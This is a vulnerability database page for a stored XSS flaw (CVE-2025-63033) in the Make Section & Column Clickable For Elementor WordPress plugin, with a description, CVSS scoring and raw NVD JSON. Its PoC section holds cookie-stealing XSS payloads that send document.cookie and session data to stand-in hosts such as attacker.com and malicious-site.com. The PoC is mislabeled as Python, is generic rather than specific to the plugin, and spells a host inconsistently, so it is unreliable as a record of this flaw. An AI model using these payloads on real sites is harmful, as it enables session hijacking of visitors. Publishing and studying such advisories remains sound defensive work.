Security Vulnerability Report
中文
CVE-2025-63033 CVSS 5.9 MEDIUM

CVE-2025-63033

Published: 2025-12-09 16:18:09
Last Modified: 2026-04-28 19:35:10

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Riyadh Ahmed Make Section & Column Clickable For Elementor make-section-column-clickable-elementor allows Stored XSS.This issue affects Make Section & Column Clickable For Elementor: from n/a through <= 2.4.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Make Section & Column Clickable For Elementor <= 2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-63033 Stored XSS PoC --> <!-- This PoC demonstrates the stored XSS vulnerability in Make Section & Column Clickable For Elementor plugin --> <!-- Prerequisites: WordPress admin/editor access --> <!-- Method 1: Using JavaScript event handler --> <div data-href='javascript:alert(document.cookie)' onclick='eval(atob("YWxlcnQoJ1hTUyBFeHBsb2l0ZWQnKQ=="))' onmouseover='eval("aler"+"t(\"XSS\")")'> Clickable Section Content </div> <!-- Method 2: Using script tag injection --> <img src='x' onerror='fetch("https://attacker.com/steal?c="+document.cookie)'> <!-- Method 3: Using SVG element --> <svg/onload=fetch(`https://attacker.com/log?cookie=${document.cookie}`)> <!-- Attacker payload example (to be injected via plugin settings): --> <script> // Cookie stealing payload var cookies = document.cookie; var img = new Image(); img.src = 'https://malicious-site.com/collect?data=' + btoa(cookies); document.body.appendChild(img); // Session hijacking fetch('https://atticious-site.com/api/save-session', { method: 'POST', body: JSON.stringify({ session: document.cookie, userAgent: navigator.userAgent, url: window.location.href }) }); </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63033", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:08.767", "lastModified": "2026-04-28T19:35:10.120", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Riyadh Ahmed Make Section & Column Clickable For Elementor make-section-column-clickable-elementor allows Stored XSS.This issue affects Make Section & Column Clickable For Elementor: from n/a through <= 2.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.7, "impactScore": 3.7}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.7, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/make-section-column-clickable-elementor/vulnerability/wordpress-make-section-column-clickable-for-elementor-plugin-2-3-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}